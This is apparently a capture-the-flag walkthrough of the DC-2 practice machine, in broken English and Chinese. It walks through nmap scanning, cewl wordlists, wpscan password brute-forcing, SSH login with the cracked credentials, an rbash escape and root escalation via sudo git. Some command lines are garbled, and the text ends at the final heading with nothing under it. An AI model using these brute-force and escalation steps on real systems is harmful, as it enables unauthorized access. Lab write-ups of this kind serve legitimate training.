dc-2 target drone
A permeate flow
Summary about the process here, and then the following detailed description of specific content:
*
1. By modifying the hosts into the site and found FLAG1
*
2. generated by cewl tool for website password dictionary, password blasting using wpscan get jerry, tom account password, log in to get backstage FLAG2
*
3. port scan found open ssh service on port 7744, using the account password to log obtained by blasting, tom successful landing, flag3 found in the home directory tom
*
rbash 4. circumvent restrictions tom and jerry user to switch to, in the main directory found flag4
*
5. use jerry user via git mention the right, into the root directory to find final_flag
II. Began to experiment
The first step Host found
[nmap 192.168.139.0/24]
The second step port scan
[nmap -A-p-192.168.139.132]
[target open port 80 and port 7744, the port 7744 is ssh, web 80 ports need to modify hosts to access the page]
Third access port 80
[Modify / etc / hosts add the following line:]
found FLAG1: here suggests cewl
--------------
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
**If you can’t find it, log in as another.**
------------
The fourth step scanning website
[-h Nikto DC-2]
[APT-GET install gcc git Ruby Ruby-OpenSSL-dev libcurl4 the make-dev zlib1g-dev] - you need to install several software
[wpscan --update] - with the new operating again (if prompted update failed repeatedly update until it succeeds)
[wpscan --url DC-2 -eu] - blasting the platform's user login name
第五步 爆破密码
[cewl dc-2 > /tmp/password.list] 生成密码字典
[vim /tmp/user.list]
[wpscan --url dc-2 -U /tmp/user.list -P /tmp/password.list]–大致两分钟
破解出
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
第六步 访问后台
第六步 ssh登录
[ ssh jerry@dc-2 -p 7744]
[ssh tom@dc-2 -p 7744 ]
发现tom的命令解释器有问题
BASH_CMDS[a]=/bin/bash;]
tom的账号被rbash限制,只能使用ls,less,scp,vi四个命令
tom主目录下有flag3.txt
---------------
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
-------------
第七步 绕过rbash
[ls usr/bin]–查看当前用户可以使用的命令
[vi /etc/passwd]
[BASH_CMDS[a]=/bin/bash]
[a]----相当于使用a调用 /bin/bash
然后调用/bin/bash 之后设定该命令解释器可以运行的命令
[PATH=PATH:/usr/bin:/bin]—即可使用所有普通用户的命令
第八步 切换到jerry用户
[su jerry]
[cd ]
[ls]
[cat flag4.txt]
---------------------
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - **git outta** here!!!!
---------------------
第九步 利用git提权
[git --help]
[sudo -l]
----------
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
------------
Then use git to enter an interactive window to execute the command to achieve privilege escalation
[-p sudo git --help]
[password root] - enter the new password
The tenth step to obtain the final flag
